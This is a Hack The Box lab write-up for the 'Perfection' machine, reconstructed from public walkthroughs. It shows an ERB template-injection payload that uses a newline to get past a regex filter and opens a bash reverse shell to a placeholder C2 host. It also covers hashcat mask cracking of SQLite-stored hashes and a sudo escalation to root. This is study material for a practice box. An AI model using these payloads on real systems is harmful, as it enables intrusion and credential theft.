~ / foobarto.me / htb-machines
--:--:-- UTC
~ / htb-machines / perfection.md

perfection

Linux · Easy · released 2024-03-02 · retired 2024-07-06

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

Perfection is an Easy Linux box: Ruby/Sinatra grade calculator → SSTI in one of the inputs (newline bypass of the regex filter) → ERB template eval → RCE as susan. Privesc: SQLite passwords + an email describing the password format {first}_{first_reversed}_{1..1B} → hashcat mask → susan’s password → sudo root.

The chain:

  1. Form blocks <%/%> in the weight field with re.match. Newline-prefix \n<%= ... %> slips past → ERB runs → reverse shell as susan.
  2. ~/Migration/wkstn.db → SHA256 hashes for staff.
  3. Email mentions password policy: name_emanReversed_INT(1..1e9).
  4. hashcat -m 1400 -a 3 hash 'susan_nasus_?d?d?d?d?d?d?d?d?d' → susan’s password.
  5. sudo -l → ALL → sudo -i → root.

Recon

22/tcp     OpenSSH
80/tcp     Sinatra grade calculator

Foothold — ERB SSTI

# weight field passes only if matches /^[0-9.]+$/m? Actually re.match without anchor.
# inject after newline
curl -X POST http://perfection.htb/weighted-grade-calc \
   -d $'category1=A&grade1=10&weight1=1\n<%= `bash -c "bash -i >& /dev/tcp/<C2>/<p> 0>&1"` %>'
# reverse shell as susan

Privesc — hashcat mask + sudo

$ sqlite3 ~/Migration/wkstn.db 'select * from users;'
... susan : <sha256>

$ hashcat -m 1400 -a 3 hash 'susan_nasus_?d?d?d?d?d?d?d?d?d'
... susan_nasus_413759210

$ sudo -l
(ALL : ALL) ALL
$ sudo -i
# root

Why each step worked

Counterfactuals

Source attribution

Reconstruction is grounded in:

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.

← all htb machines hackthebox.com ↗